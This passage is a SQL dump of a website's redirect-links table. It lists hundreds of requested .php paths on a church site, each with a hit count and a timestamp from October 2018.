(9083, 'https://www.lifeoasisinternationalchurch.org/ta.php', NULL, '', '', 2, 0, '2018-10-06 18:25:48', '0000-00-00 00:00:00', 301),
(9084, 'https://www.lifeoasisinternationalchurch.org/ud.php', NULL, '', '', 2, 0, '2018-10-06 18:48:20', '0000-00-00 00:00:00', 301),
(9085, 'https://www.lifeoasisinternationalchurch.org/cn.php', NULL, '', '', 2, 0, '2018-10-06 18:55:54', '0000-00-00 00:00:00', 301),
(9086, 'https://www.lifeoasisinternationalchurch.org/qa.php', NULL, '', '', 2, 0, '2018-10-06 19:03:19', '0000-00-00 00:00:00', 301),
(9087, 'https://www.lifeoasisinternationalchurch.org/um.php', NULL, '', '', 2, 0, '2018-10-06 19:10:42', '0000-00-00 00:00:00', 301),
(9088, 'https://www.lifeoasisinternationalchurch.org/nw.php', NULL, '', '', 2, 0, '2018-10-06 19:25:40', '0000-00-00 00:00:00', 301),
(9089, 'https://www.lifeoasisinternationalchurch.org/lj.php', NULL, '', '', 2, 0, '2018-10-06 19:33:11', '0000-00-00 00:00:00', 301),
(9090, 'https://www.lifeoasisinternationalchurch.org/sj.php', NULL, '', '', 2, 0, '2018-10-06 19:40:35', '0000-00-00 00:00:00', 301),
(9091, 'https://www.lifeoasisinternationalchurch.org/kv.php', NULL, '', '', 2, 0, '2018-10-06 19:48:15', '0000-00-00 00:00:00', 301),
(9092, 'https://www.lifeoasisinternationalchurch.org/ix.php', NULL, '', '', 2, 0, '2018-10-06 19:56:02', '0000-00-00 00:00:00', 301),
(9093, 'https://www.lifeoasisinternationalchurch.org/jc.php', NULL, '', '', 2, 0, '2018-10-06 20:03:40', '0000-00-00 00:00:00', 301),
(9094, 'https://www.lifeoasisinternationalchurch.org/ju.php', NULL, '', '', 2, 0, '2018-10-06 20:11:14', '0000-00-00 00:00:00', 301),
(9095, 'https://www.lifeoasisinternationalchurch.org/iy.php', NULL, '', '', 2, 0, '2018-10-06 20:18:37', '0000-00-00 00:00:00', 301),
(9096, 'https://www.lifeoasisinternationalchurch.org/zc.php', NULL, '', '', 2, 0, '2018-10-06 20:25:59', '0000-00-00 00:00:00', 301),
(9097, 'https://www.lifeoasisinternationalchurch.org/zj.php', NULL, '', '', 2, 0, '2018-10-06 20:33:19', '0000-00-00 00:00:00', 301),
(9098, 'https://www.lifeoasisinternationalchurch.org/xf.php', NULL, '', '', 2, 0, '2018-10-06 20:40:45', '0000-00-00 00:00:00', 301),
(9099, 'https://www.lifeoasisinternationalchurch.org/ox.php', NULL, '', '', 2, 0, '2018-10-06 20:48:09', '0000-00-00 00:00:00', 301),
(9100, 'https://www.lifeoasisinternationalchurch.org/bt.php', NULL, '', '', 2, 0, '2018-10-06 20:55:31', '0000-00-00 00:00:00', 301),
(9101, 'https://www.lifeoasisinternationalchurch.org/qp.php', NULL, '', '', 2, 0, '2018-10-06 21:02:54', '0000-00-00 00:00:00', 301),
(9102, 'https://www.lifeoasisinternationalchurch.org/fm.php', NULL, '', '', 2, 0, '2018-10-06 21:10:19', '0000-00-00 00:00:00', 301),
(9103, 'https://www.lifeoasisinternationalchurch.org/bz.php', NULL, '', '', 2, 0, '2018-10-06 21:17:52', '0000-00-00 00:00:00', 301),
(9104, 'https://www.lifeoasisinternationalchurch.org/oe.php', NULL, '', '', 2, 0, '2018-10-06 21:25:19', '0000-00-00 00:00:00', 301),
(9105, 'https://www.lifeoasisinternationalchurch.org/bj.php', NULL, '', '', 2, 0, '2018-10-06 21:32:50', '0000-00-00 00:00:00', 301),
(9106, 'https://www.lifeoasisinternationalchurch.org/fl.php', NULL, '', '', 2, 0, '2018-10-06 21:40:27', '0000-00-00 00:00:00', 301),
(9107, 'https://www.lifeoasisinternationalchurch.org/ld.php', NULL, '', '', 2, 0, '2018-10-06 21:47:53', '0000-00-00 00:00:00', 301),
(9108, 'https://www.lifeoasisinternationalchurch.org/ts.php', NULL, '', '', 2, 0, '2018-10-06 22:02:44', '0000-00-00 00:00:00', 301),
(9109, 'https://www.lifeoasisinternationalchurch.org/ic.php', NULL, '', '', 2, 0, '2018-10-06 22:10:01', '0000-00-00 00:00:00', 301),
(9110, 'https://www.lifeoasisinternationalchurch.org/uk.php', NULL, '', '', 2, 0, '2018-10-06 22:17:19', '0000-00-00 00:00:00', 301),
(9111, 'https://www.lifeoasisinternationalchurch.org/zw.php', NULL, '', '', 2, 0, '2018-10-06 22:24:34', '0000-00-00 00:00:00', 301),
(9112, 'https://www.lifeoasisinternationalchurch.org/mb.php', NULL, '', '', 2, 0, '2018-10-06 22:31:58', '0000-00-00 00:00:00', 301),
(9113, 'https://www.lifeoasisinternationalchurch.org/il.php', NULL, '', '', 2, 0, '2018-10-06 22:39:14', '0000-00-00 00:00:00', 301),
(9114, 'https://www.lifeoasisinternationalchurch.org/ez.php', NULL, '', '', 2, 0, '2018-10-06 22:46:32', '0000-00-00 00:00:00', 301),
(9115, 'https://www.lifeoasisinternationalchurch.org/qb.php', NULL, '', '', 2, 0, '2018-10-06 22:53:46', '0000-00-00 00:00:00', 301),
(9116, 'https://www.lifeoasisinternationalchurch.org/fn.php', NULL, '', '', 2, 0, '2018-10-06 23:01:04', '0000-00-00 00:00:00', 301),
(9117, 'https://www.lifeoasisinternationalchurch.org/sf.php', NULL, '', '', 2, 0, '2018-10-06 23:08:35', '0000-00-00 00:00:00', 301),
(9118, 'https://www.lifeoasisinternationalchurch.org/ra.php', NULL, '', '', 2, 0, '2018-10-06 23:16:07', '0000-00-00 00:00:00', 301),
(9119, 'https://www.lifeoasisinternationalchurch.org/fo.php', NULL, '', '', 2, 0, '2018-10-06 23:23:45', '0000-00-00 00:00:00', 301),
(9120, 'https://www.lifeoasisinternationalchurch.org/hr.php', NULL, '', '', 2, 0, '2018-10-06 23:31:38', '0000-00-00 00:00:00', 301),
(9121, 'https://www.lifeoasisinternationalchurch.org/bq.php', NULL, '', '', 2, 0, '2018-10-06 23:38:59', '0000-00-00 00:00:00', 301),
(9122, 'https://www.lifeoasisinternationalchurch.org/jt.php', NULL, '', '', 2, 0, '2018-10-06 23:46:21', '0000-00-00 00:00:00', 301),
(9123, 'https://www.lifeoasisinternationalchurch.org/do.php', NULL, '', '', 2, 0, '2018-10-06 23:53:39', '0000-00-00 00:00:00', 301),
(9124, 'https://www.lifeoasisinternationalchurch.org/os.php', NULL, '', '', 2, 0, '2018-10-07 00:08:36', '0000-00-00 00:00:00', 301),
(9125, 'https://www.lifeoasisinternationalchurch.org/ly.php', NULL, '', '', 2, 0, '2018-10-07 00:31:00', '0000-00-00 00:00:00', 301),
(9126, 'https://www.lifeoasisinternationalchurch.org/li.php', NULL, '', '', 2, 0, '2018-10-07 00:38:21', '0000-00-00 00:00:00', 301),
(9127, 'https://www.lifeoasisinternationalchurch.org/ia.php', NULL, '', '', 2, 0, '2018-10-07 00:52:55', '0000-00-00 00:00:00', 301),
(9128, 'https://www.lifeoasisinternationalchurch.org/wt.php', NULL, '', '', 2, 0, '2018-10-07 01:00:20', '0000-00-00 00:00:00', 301),
(9129, 'https://www.lifeoasisinternationalchurch.org/zk.php', NULL, '', '', 2, 0, '2018-10-07 01:07:40', '0000-00-00 00:00:00', 301),
(9130, 'https://www.lifeoasisinternationalchurch.org/dd.php', NULL, '', '', 2, 0, '2018-10-07 01:15:12', '0000-00-00 00:00:00', 301),
(9131, 'https://www.lifeoasisinternationalchurch.org/ag.php', NULL, '', '', 2, 0, '2018-10-07 01:30:19', '0000-00-00 00:00:00', 301),
(9132, 'https://www.lifeoasisinternationalchurch.org/xr.php', NULL, '', '', 2, 0, '2018-10-07 01:37:52', '0000-00-00 00:00:00', 301),
(9133, 'https://www.lifeoasisinternationalchurch.org/th.php', NULL, '', '', 2, 0, '2018-10-07 01:45:47', '0000-00-00 00:00:00', 301),
(9134, 'https://www.lifeoasisinternationalchurch.org/ew.php', NULL, '', '', 2, 0, '2018-10-07 01:53:10', '0000-00-00 00:00:00', 301),
(9135, 'https://www.lifeoasisinternationalchurch.org/gh.php', NULL, '', '', 2, 0, '2018-10-07 02:00:40', '0000-00-00 00:00:00', 301),
(9136, 'https://www.lifeoasisinternationalchurch.org/vd.php', NULL, '', '', 2, 0, '2018-10-07 02:08:12', '0000-00-00 00:00:00', 301),
(9137, 'https://www.lifeoasisinternationalchurch.org/bg.php', NULL, '', '', 2, 0, '2018-10-07 02:15:41', '0000-00-00 00:00:00', 301),
(9138, 'https://www.lifeoasisinternationalchurch.org/ow.php', NULL, '', '', 2, 0, '2018-10-07 02:22:59', '0000-00-00 00:00:00', 301),
(9139, 'https://www.lifeoasisinternationalchurch.org/zp.php', NULL, '', '', 2, 0, '2018-10-07 02:30:20', '0000-00-00 00:00:00', 301),
(9140, 'https://www.lifeoasisinternationalchurch.org/zi.php', NULL, '', '', 2, 0, '2018-10-07 02:37:40', '0000-00-00 00:00:00', 301),
(9141, 'https://www.lifeoasisinternationalchurch.org/cs.php', NULL, '', '', 2, 0, '2018-10-07 02:45:01', '0000-00-00 00:00:00', 301),
(9142, 'https://www.lifeoasisinternationalchurch.org/xu.php', NULL, '', '', 2, 0, '2018-10-07 02:59:40', '0000-00-00 00:00:00', 301),
(9143, 'https://www.lifeoasisinternationalchurch.org/dq.php', NULL, '', '', 2, 0, '2018-10-07 03:07:10', '0000-00-00 00:00:00', 301),
(9144, 'https://www.lifeoasisinternationalchurch.org/nb.php', NULL, '', '', 2, 0, '2018-10-07 03:14:41', '0000-00-00 00:00:00', 301),
(9145, 'https://www.lifeoasisinternationalchurch.org/mp.php', NULL, '', '', 2, 0, '2018-10-07 03:22:13', '0000-00-00 00:00:00', 301),
(9146, 'https://www.lifeoasisinternationalchurch.org/cq.php', NULL, '', '', 2, 0, '2018-10-07 03:29:38', '0000-00-00 00:00:00', 301),
(9147, 'https://www.lifeoasisinternationalchurch.org/uz.php', NULL, '', '', 2, 0, '2018-10-07 03:44:23', '0000-00-00 00:00:00', 301),
(9148, 'https://www.lifeoasisinternationalchurch.org/rh.php', NULL, '', '', 2, 0, '2018-10-07 03:51:38', '0000-00-00 00:00:00', 301),
(9149, 'https://www.lifeoasisinternationalchurch.org/yj.php', NULL, '', '', 2, 0, '2018-10-07 03:58:59', '0000-00-00 00:00:00', 301),
(9150, 'https://www.lifeoasisinternationalchurch.org/mn.php', NULL, '', '', 2, 0, '2018-10-07 04:06:28', '0000-00-00 00:00:00', 301),
(9151, 'https://www.lifeoasisinternationalchurch.org/vb.php', NULL, '', '', 2, 0, '2018-10-07 04:13:59', '0000-00-00 00:00:00', 301),
(9152, 'https://www.lifeoasisinternationalchurch.org/xy.php', NULL, '', '', 2, 0, '2018-10-07 04:21:41', '0000-00-00 00:00:00', 301),
(9153, 'https://www.lifeoasisinternationalchurch.org/al.php', NULL, '', '', 2, 0, '2018-10-07 04:29:45', '0000-00-00 00:00:00', 301),
(9154, 'https://www.lifeoasisinternationalchurch.org/tn.php', NULL, '', '', 2, 0, '2018-10-07 04:44:36', '0000-00-00 00:00:00', 301),
(9155, 'https://www.lifeoasisinternationalchurch.org/zh.php', NULL, '', '', 2, 0, '2018-10-07 04:51:49', '0000-00-00 00:00:00', 301),
(9156, 'https://www.lifeoasisinternationalchurch.org/rb.php', NULL, '', '', 2, 0, '2018-10-07 04:59:02', '0000-00-00 00:00:00', 301),
(9157, 'https://www.lifeoasisinternationalchurch.org/wn.php', NULL, '', '', 2, 0, '2018-10-07 05:06:21', '0000-00-00 00:00:00', 301),
(9158, 'https://www.lifeoasisinternationalchurch.org/cl.php', NULL, '', '', 2, 0, '2018-10-07 05:20:54', '0000-00-00 00:00:00', 301),
(9159, 'https://www.lifeoasisinternationalchurch.org/is.php', NULL, '', '', 2, 0, '2018-10-07 05:28:07', '0000-00-00 00:00:00', 301),
(9160, 'https://www.lifeoasisinternationalchurch.org/fu.php', NULL, '', '', 2, 0, '2018-10-07 05:35:26', '0000-00-00 00:00:00', 301),
(9161, 'https://lifeoasisinternationalchurch.org/streaming/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2018-10-07 05:42:20', '0000-00-00 00:00:00', 301),
(9162, 'https://www.lifeoasisinternationalchurch.org/nh.php', NULL, '', '', 2, 0, '2018-10-07 05:42:36', '0000-00-00 00:00:00', 301),
(9163, 'https://www.lifeoasisinternationalchurch.org/nz.php', NULL, '', '', 2, 0, '2018-10-07 05:49:42', '0000-00-00 00:00:00', 301),
(9164, 'https://www.lifeoasisinternationalchurch.org/vc.php', NULL, '', '', 2, 0, '2018-10-07 05:56:57', '0000-00-00 00:00:00', 301),
(9165, 'https://www.lifeoasisinternationalchurch.org/kf.php', NULL, '', '', 2, 0, '2018-10-07 06:04:10', '0000-00-00 00:00:00', 301),
(9166, 'https://www.lifeoasisinternationalchurch.org/vq.php', NULL, '', '', 2, 0, '2018-10-07 06:11:29', '0000-00-00 00:00:00', 301),
(9167, 'https://www.lifeoasisinternationalchurch.org/tb.php', NULL, '', '', 2, 0, '2018-10-07 06:18:48', '0000-00-00 00:00:00', 301),
(9168, 'https://www.lifeoasisinternationalchurch.org/ja.php', NULL, '', '', 2, 0, '2018-10-07 06:26:05', '0000-00-00 00:00:00', 301),
(9169, 'https://www.lifeoasisinternationalchurch.org/vx.php', NULL, '', '', 2, 0, '2018-10-07 06:33:19', '0000-00-00 00:00:00', 301),
(9170, 'https://www.lifeoasisinternationalchurch.org/fj.php', NULL, '', '', 2, 0, '2018-10-07 06:40:44', '0000-00-00 00:00:00', 301),
(9171, 'https://www.lifeoasisinternationalchurch.org/qz.php', NULL, '', '', 2, 0, '2018-10-07 06:47:57', '0000-00-00 00:00:00', 301),
(9172, 'https://www.lifeoasisinternationalchurch.org/hm.php', NULL, '', '', 2, 0, '2018-10-07 06:55:18', '0000-00-00 00:00:00', 301),
(9173, 'https://www.lifeoasisinternationalchurch.org/uh.php', NULL, '', '', 2, 0, '2018-10-07 07:02:45', '0000-00-00 00:00:00', 301),
(9174, 'https://www.lifeoasisinternationalchurch.org/tx.php', NULL, '', '', 2, 0, '2018-10-07 07:10:09', '0000-00-00 00:00:00', 301),
(9175, 'https://www.lifeoasisinternationalchurch.org/bf.php', NULL, '', '', 2, 0, '2018-10-07 07:17:35', '0000-00-00 00:00:00', 301),
(9176, 'https://www.lifeoasisinternationalchurch.org/va.php', NULL, '', '', 2, 0, '2018-10-07 07:24:51', '0000-00-00 00:00:00', 301),
(9177, 'https://www.lifeoasisinternationalchurch.org/dn.php', NULL, '', '', 2, 0, '2018-10-07 07:39:21', '0000-00-00 00:00:00', 301),
(9178, 'https://www.lifeoasisinternationalchurch.org/uf.php', NULL, '', '', 2, 0, '2018-10-07 07:46:33', '0000-00-00 00:00:00', 301),
(9179, 'https://www.lifeoasisinternationalchurch.org/xt.php', NULL, '', '', 2, 0, '2018-10-07 07:53:40', '0000-00-00 00:00:00', 301),
(9180, 'https://www.lifeoasisinternationalchurch.org/tg.php', NULL, '', '', 2, 0, '2018-10-07 08:00:52', '0000-00-00 00:00:00', 301),
(9181, 'https://www.lifeoasisinternationalchurch.org/gw.php', NULL, '', '', 2, 0, '2018-10-07 08:08:08', '0000-00-00 00:00:00', 301),
(9182, 'https://www.lifeoasisinternationalchurch.org/kz.php', NULL, '', '', 2, 0, '2018-10-07 08:15:28', '0000-00-00 00:00:00', 301),
(9183, 'https://www.lifeoasisinternationalchurch.org/vp.php', NULL, '', '', 2, 0, '2018-10-07 08:22:44', '0000-00-00 00:00:00', 301),
(9184, 'https://www.lifeoasisinternationalchurch.org/vl.php', NULL, '', '', 2, 0, '2018-10-07 08:30:02', '0000-00-00 00:00:00', 301),
(9185, 'https://www.lifeoasisinternationalchurch.org/ry.php', NULL, '', '', 2, 0, '2018-10-07 08:37:19', '0000-00-00 00:00:00', 301),
(9186, 'https://www.lifeoasisinternationalchurch.org/co.php', NULL, '', '', 2, 0, '2018-10-07 08:44:37', '0000-00-00 00:00:00', 301),
(9187, 'https://www.lifeoasisinternationalchurch.org/lv.php', NULL, '', '', 2, 0, '2018-10-07 08:51:54', '0000-00-00 00:00:00', 301),
(9188, 'https://www.lifeoasisinternationalchurch.org/dh.php', NULL, '', '', 2, 0, '2018-10-07 08:59:07', '0000-00-00 00:00:00', 301),
(9189, 'https://www.lifeoasisinternationalchurch.org/ty.php', NULL, '', '', 2, 0, '2018-10-07 09:06:27', '0000-00-00 00:00:00', 301),
(9190, 'https://www.lifeoasisinternationalchurch.org/ku.php', NULL, '', '', 2, 0, '2018-10-07 09:13:43', '0000-00-00 00:00:00', 301),
(9191, 'https://www.lifeoasisinternationalchurch.org/vi.php', NULL, '', '', 2, 0, '2018-10-07 09:20:59', '0000-00-00 00:00:00', 301),
(9192, 'https://www.lifeoasisinternationalchurch.org/yd.php', NULL, '', '', 2, 0, '2018-10-07 09:28:13', '0000-00-00 00:00:00', 301),
(9193, 'https://www.lifeoasisinternationalchurch.org/jl.php', NULL, '', '', 2, 0, '2018-10-07 09:35:33', '0000-00-00 00:00:00', 301),
(9194, 'https://www.lifeoasisinternationalchurch.org/yb.php', NULL, '', '', 2, 0, '2018-10-07 09:42:48', '0000-00-00 00:00:00', 301),
(9195, 'https://www.lifeoasisinternationalchurch.org/gn.php', NULL, '', '', 2, 0, '2018-10-07 09:50:03', '0000-00-00 00:00:00', 301),
(9196, 'https://www.lifeoasisinternationalchurch.org/nd.php', NULL, '', '', 2, 0, '2018-10-07 09:57:17', '0000-00-00 00:00:00', 301),
(9197, 'https://www.lifeoasisinternationalchurch.org/fw.php', NULL, '', '', 2, 0, '2018-10-07 10:11:41', '0000-00-00 00:00:00', 301),
(9198, 'https://www.lifeoasisinternationalchurch.org/hk.php', NULL, '', '', 2, 0, '2018-10-07 10:18:50', '0000-00-00 00:00:00', 301),
(9199, 'https://www.lifeoasisinternationalchurch.org/vw.php', NULL, '', '', 2, 0, '2018-10-07 10:25:58', '0000-00-00 00:00:00', 301),
(9200, 'https://www.lifeoasisinternationalchurch.org/ln.php', NULL, '', '', 2, 0, '2018-10-07 10:40:22', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(9201, 'https://www.lifeoasisinternationalchurch.org/su.php', NULL, '', '', 2, 0, '2018-10-07 10:47:34', '0000-00-00 00:00:00', 301),
(9202, 'https://www.lifeoasisinternationalchurch.org/xl.php', NULL, '', '', 2, 0, '2018-10-07 10:54:48', '0000-00-00 00:00:00', 301),
(9203, 'https://www.lifeoasisinternationalchurch.org/yn.php', NULL, '', '', 2, 0, '2018-10-07 11:02:06', '0000-00-00 00:00:00', 301),
(9204, 'https://www.lifeoasisinternationalchurch.org/dk.php', NULL, '', '', 2, 0, '2018-10-07 11:09:22', '0000-00-00 00:00:00', 301),
(9205, 'https://www.lifeoasisinternationalchurch.org/lb.php', NULL, '', '', 2, 0, '2018-10-07 11:16:40', '0000-00-00 00:00:00', 301),
(9206, 'https://www.lifeoasisinternationalchurch.org/nr.php', NULL, '', '', 2, 0, '2018-10-07 11:23:57', '0000-00-00 00:00:00', 301),
(9207, 'https://www.lifeoasisinternationalchurch.org/if.php', NULL, '', '', 2, 0, '2018-10-07 11:31:12', '0000-00-00 00:00:00', 301),
(9208, 'https://www.lifeoasisinternationalchurch.org/yo.php', NULL, '', '', 2, 0, '2018-10-07 11:38:24', '0000-00-00 00:00:00', 301),
(9209, 'https://www.lifeoasisinternationalchurch.org/gk.php', NULL, '', '', 2, 0, '2018-10-07 11:45:51', '0000-00-00 00:00:00', 301),
(9210, 'https://www.lifeoasisinternationalchurch.org/yi.php', NULL, '', '', 2, 0, '2018-10-07 11:53:23', '0000-00-00 00:00:00', 301),
(9211, 'https://www.lifeoasisinternationalchurch.org/wk.php', NULL, '', '', 2, 0, '2018-10-07 12:01:30', '0000-00-00 00:00:00', 301),
(9212, 'https://www.lifeoasisinternationalchurch.org/nq.php', NULL, '', '', 2, 0, '2018-10-07 12:08:54', '0000-00-00 00:00:00', 301),
(9213, 'https://www.lifeoasisinternationalchurch.org/px.php', NULL, '', '', 2, 0, '2018-10-07 12:16:22', '0000-00-00 00:00:00', 301),
(9214, 'https://www.lifeoasisinternationalchurch.org/jk.php', NULL, '', '', 2, 0, '2018-10-07 12:23:41', '0000-00-00 00:00:00', 301),
(9215, 'https://www.lifeoasisinternationalchurch.org/tm.php', NULL, '', '', 2, 0, '2018-10-07 12:30:54', '0000-00-00 00:00:00', 301),
(9216, 'https://www.lifeoasisinternationalchurch.org/yr.php', NULL, '', '', 2, 0, '2018-10-07 12:38:10', '0000-00-00 00:00:00', 301),
(9217, 'https://www.lifeoasisinternationalchurch.org/it.php', NULL, '', '', 2, 0, '2018-10-07 12:45:24', '0000-00-00 00:00:00', 301),
(9218, 'https://www.lifeoasisinternationalchurch.org/pf.php', NULL, '', '', 2, 0, '2018-10-07 12:53:27', '0000-00-00 00:00:00', 301),
(9219, 'https://www.lifeoasisinternationalchurch.org/au.php', NULL, '', '', 2, 0, '2018-10-07 13:00:46', '0000-00-00 00:00:00', 301),
(9220, 'https://www.lifeoasisinternationalchurch.org/wl.php', NULL, '', '', 2, 0, '2018-10-07 13:07:55', '0000-00-00 00:00:00', 301),
(9221, 'https://www.lifeoasisinternationalchurch.org/yw.php', NULL, '', '', 2, 0, '2018-10-07 13:15:10', '0000-00-00 00:00:00', 301),
(9222, 'https://www.lifeoasisinternationalchurch.org/fp.php', NULL, '', '', 2, 0, '2018-10-07 13:29:45', '0000-00-00 00:00:00', 301),
(9223, 'https://www.lifeoasisinternationalchurch.org/df.php', NULL, '', '', 2, 0, '2018-10-07 13:37:03', '0000-00-00 00:00:00', 301),
(9224, 'https://www.lifeoasisinternationalchurch.org/ua.php', NULL, '', '', 2, 0, '2018-10-07 13:44:16', '0000-00-00 00:00:00', 301),
(9225, 'https://www.lifeoasisinternationalchurch.org/ri.php', NULL, '', '', 2, 0, '2018-10-07 13:51:36', '0000-00-00 00:00:00', 301),
(9226, 'https://www.lifeoasisinternationalchurch.org/ye.php', NULL, '', '', 2, 0, '2018-10-07 13:58:48', '0000-00-00 00:00:00', 301),
(9227, 'https://www.lifeoasisinternationalchurch.org/kn.php', NULL, '', '', 2, 0, '2018-10-07 14:06:06', '0000-00-00 00:00:00', 301),
(9228, 'https://www.lifeoasisinternationalchurch.org/un.php', NULL, '', '', 2, 0, '2018-10-07 14:13:17', '0000-00-00 00:00:00', 301),
(9229, 'https://www.lifeoasisinternationalchurch.org/tv.php', NULL, '', '', 2, 0, '2018-10-07 14:20:27', '0000-00-00 00:00:00', 301),
(9230, 'https://www.lifeoasisinternationalchurch.org/by.php', NULL, '', '', 2, 0, '2018-10-07 14:27:37', '0000-00-00 00:00:00', 301),
(9231, 'https://www.lifeoasisinternationalchurch.org/am.php', NULL, '', '', 2, 0, '2018-10-07 14:34:44', '0000-00-00 00:00:00', 301),
(9232, 'https://www.lifeoasisinternationalchurch.org/mx.php', NULL, '', '', 2, 0, '2018-10-07 14:41:53', '0000-00-00 00:00:00', 301),
(9233, 'https://www.lifeoasisinternationalchurch.org/yv.php', NULL, '', '', 2, 0, '2018-10-07 14:48:58', '0000-00-00 00:00:00', 301),
(9234, 'https://www.lifeoasisinternationalchurch.org/sq.php', NULL, '', '', 2, 0, '2018-10-07 14:56:06', '0000-00-00 00:00:00', 301),
(9235, 'https://www.lifeoasisinternationalchurch.org/te.php', NULL, '', '', 2, 0, '2018-10-07 15:03:21', '0000-00-00 00:00:00', 301),
(9236, 'https://www.lifeoasisinternationalchurch.org/mr.php', NULL, '', '', 2, 0, '2018-10-07 15:13:27', '0000-00-00 00:00:00', 301),
(9237, 'https://www.lifeoasisinternationalchurch.org/uv.php', NULL, '', '', 2, 0, '2018-10-07 15:20:43', '0000-00-00 00:00:00', 301),
(9238, 'https://www.lifeoasisinternationalchurch.org/mj.php', NULL, '', '', 2, 0, '2018-10-07 15:28:02', '0000-00-00 00:00:00', 301),
(9239, 'https://www.lifeoasisinternationalchurch.org/oo.php', NULL, '', '', 2, 0, '2018-10-07 15:35:22', '0000-00-00 00:00:00', 301),
(9240, 'https://www.lifeoasisinternationalchurch.org/eb.php', NULL, '', '', 2, 0, '2018-10-07 15:42:32', '0000-00-00 00:00:00', 301),
(9241, 'https://www.lifeoasisinternationalchurch.org/jd.php', NULL, '', '', 2, 0, '2018-10-07 15:49:49', '0000-00-00 00:00:00', 301),
(9242, 'https://www.lifeoasisinternationalchurch.org/ff.php', NULL, '', '', 2, 0, '2018-10-07 15:57:10', '0000-00-00 00:00:00', 301),
(9243, 'https://www.lifeoasisinternationalchurch.org/mf.php', NULL, '', '', 2, 0, '2018-10-07 16:04:30', '0000-00-00 00:00:00', 301),
(9244, 'https://www.lifeoasisinternationalchurch.org/rf.php', NULL, '', '', 2, 0, '2018-10-07 16:11:51', '0000-00-00 00:00:00', 301),
(9245, 'https://www.lifeoasisinternationalchurch.org/lt.php', NULL, '', '', 2, 0, '2018-10-07 16:24:12', '0000-00-00 00:00:00', 301),
(9246, 'https://www.lifeoasisinternationalchurch.org/dz.php', NULL, '', '', 2, 0, '2018-10-07 16:38:40', '0000-00-00 00:00:00', 301),
(9247, 'https://www.lifeoasisinternationalchurch.org/tf.php', NULL, '', '', 2, 0, '2018-10-07 16:45:51', '0000-00-00 00:00:00', 301),
(9248, 'https://www.lifeoasisinternationalchurch.org/bm.php', NULL, '', '', 2, 0, '2018-10-07 16:53:05', '0000-00-00 00:00:00', 301),
(9249, 'https://www.lifeoasisinternationalchurch.org/ed.php', NULL, '', '', 2, 0, '2018-10-07 17:00:26', '0000-00-00 00:00:00', 301),
(9250, 'https://www.lifeoasisinternationalchurch.org/sv.php', NULL, '', '', 2, 0, '2018-10-07 17:08:01', '0000-00-00 00:00:00', 301),
(9251, 'https://www.lifeoasisinternationalchurch.org/oi.php', NULL, '', '', 2, 0, '2018-10-07 17:15:31', '0000-00-00 00:00:00', 301),
(9252, 'https://www.lifeoasisinternationalchurch.org/av.php', NULL, '', '', 2, 0, '2018-10-07 17:30:24', '0000-00-00 00:00:00', 301),
(9253, 'https://www.lifeoasisinternationalchurch.org/uo.php', NULL, '', '', 2, 0, '2018-10-07 17:44:49', '0000-00-00 00:00:00', 301),
(9254, 'https://www.lifeoasisinternationalchurch.org/bo.php', NULL, '', '', 2, 0, '2018-10-07 17:51:59', '0000-00-00 00:00:00', 301),
(9255, 'https://www.lifeoasisinternationalchurch.org/fc.php', NULL, '', '', 2, 0, '2018-10-07 17:59:08', '0000-00-00 00:00:00', 301),
(9256, 'https://www.lifeoasisinternationalchurch.org/ey.php', NULL, '', '', 2, 0, '2018-10-07 18:13:46', '0000-00-00 00:00:00', 301),
(9257, 'https://www.lifeoasisinternationalchurch.org/aw.php', NULL, '', '', 2, 0, '2018-10-07 18:21:03', '0000-00-00 00:00:00', 301),
(9258, 'https://www.lifeoasisinternationalchurch.org/oz.php', NULL, '', '', 2, 0, '2018-10-07 18:28:16', '0000-00-00 00:00:00', 301),
(9259, 'https://www.lifeoasisinternationalchurch.org/xv.php', NULL, '', '', 2, 0, '2018-10-07 18:35:32', '0000-00-00 00:00:00', 301),
(9260, 'https://www.lifeoasisinternationalchurch.org/cv.php', NULL, '', '', 2, 0, '2018-10-07 18:42:47', '0000-00-00 00:00:00', 301),
(9261, 'https://www.lifeoasisinternationalchurch.org/ue.php', NULL, '', '', 2, 0, '2018-10-07 18:50:08', '0000-00-00 00:00:00', 301),
(9262, 'https://www.lifeoasisinternationalchurch.org/cc.php', NULL, '', '', 2, 0, '2018-10-07 18:57:20', '0000-00-00 00:00:00', 301),
(9263, 'https://www.lifeoasisinternationalchurch.org/rx.php', NULL, '', '', 2, 0, '2018-10-07 19:04:39', '0000-00-00 00:00:00', 301),
(9264, 'https://www.lifeoasisinternationalchurch.org/hl.php', NULL, '', '', 2, 0, '2018-10-07 19:12:02', '0000-00-00 00:00:00', 301),
(9265, 'https://www.lifeoasisinternationalchurch.org/hj.php', NULL, '', '', 2, 0, '2018-10-07 19:19:16', '0000-00-00 00:00:00', 301),
(9266, 'https://www.lifeoasisinternationalchurch.org/ne.php', NULL, '', '', 2, 0, '2018-10-07 19:26:32', '0000-00-00 00:00:00', 301),
(9267, 'https://www.lifeoasisinternationalchurch.org/bk.php', NULL, '', '', 2, 0, '2018-10-07 19:33:44', '0000-00-00 00:00:00', 301),
(9268, 'https://www.lifeoasisinternationalchurch.org/hv.php', NULL, '', '', 2, 0, '2018-10-07 19:41:02', '0000-00-00 00:00:00', 301),
(9269, 'https://www.lifeoasisinternationalchurch.org/ui.php', NULL, '', '', 2, 0, '2018-10-07 19:48:16', '0000-00-00 00:00:00', 301),
(9270, 'https://www.lifeoasisinternationalchurch.org/tp.php', NULL, '', '', 2, 0, '2018-10-07 19:55:27', '0000-00-00 00:00:00', 301),
(9271, 'https://www.lifeoasisinternationalchurch.org/ev.php', NULL, '', '', 2, 0, '2018-10-07 20:02:40', '0000-00-00 00:00:00', 301),
(9272, 'https://www.lifeoasisinternationalchurch.org/gb.php', NULL, '', '', 2, 0, '2018-10-07 20:09:52', '0000-00-00 00:00:00', 301),
(9273, 'https://www.lifeoasisinternationalchurch.org/xd.php', NULL, '', '', 2, 0, '2018-10-07 20:24:14', '0000-00-00 00:00:00', 301),
(9274, 'https://www.lifeoasisinternationalchurch.org/dw.php', NULL, '', '', 2, 0, '2018-10-07 20:31:27', '0000-00-00 00:00:00', 301),
(9275, 'https://www.lifeoasisinternationalchurch.org/rs.php', NULL, '', '', 2, 0, '2018-10-07 20:38:44', '0000-00-00 00:00:00', 301),
